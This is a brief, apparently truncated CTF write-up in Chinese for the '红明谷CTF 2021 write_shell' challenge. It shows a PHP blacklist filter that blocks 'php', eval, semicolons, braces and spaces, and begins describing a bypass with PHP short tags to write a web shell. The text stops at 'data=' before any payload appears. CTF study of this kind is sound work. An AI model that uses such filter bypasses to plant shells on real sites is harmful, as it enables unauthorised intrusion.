BUU-[红明谷CTF 2021]write_shell

```php function check($input) { if (preg_match("/'| |_|php|;|~|\\^|\\+|eval|{|}/i", $input)) { // if(preg_match("/'| |_|=|php/",$input)){ die('hacker!!!'); } else { return $input; } } ``` 绕过check函数: 1. 绕过`php` 使用PHP的短标签: 最终的payload: data=